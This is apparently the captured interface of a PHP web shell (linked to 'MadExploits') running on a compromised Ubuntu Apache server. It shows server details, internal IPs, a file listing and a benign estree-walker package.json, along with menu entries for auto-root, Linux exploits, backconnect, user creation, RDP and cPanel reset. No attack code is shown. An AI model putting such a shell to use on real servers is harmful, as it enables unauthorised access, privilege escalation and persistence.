Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
estree-walker /
[ HOME SHELL ]
Name
Size
Permission
Action
src
[ DIR ]
drwxr-xr-x
types
[ DIR ]
drwxr-xr-x
LICENSE
1.1
KB
-rw-r--r--
README.md
1.55
KB
-rw-r--r--
package.json
720
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "estree-walker", "description": "Traverse an ESTree-compliant AST", "version": "3.0.3", "private": false, "author": "Rich Harris", "license": "MIT", "repository": { "type": "git", "url": "https://github.com/Rich-Harris/estree-walker" }, "type": "module", "module": "./src/index.js", "exports": { "./package.json": "./package.json", ".": { "types": "./types/index.d.ts", "import": "./src/index.js" } }, "types": "types/index.d.ts", "scripts": { "prepublishOnly": "tsc && npm test", "test": "uvu test" }, "dependencies": { "@types/estree": "^1.0.0" }, "devDependencies": { "typescript": "^4.9.0", "uvu": "^0.5.1" }, "files": [ "src", "types", "README.md" ] }
Close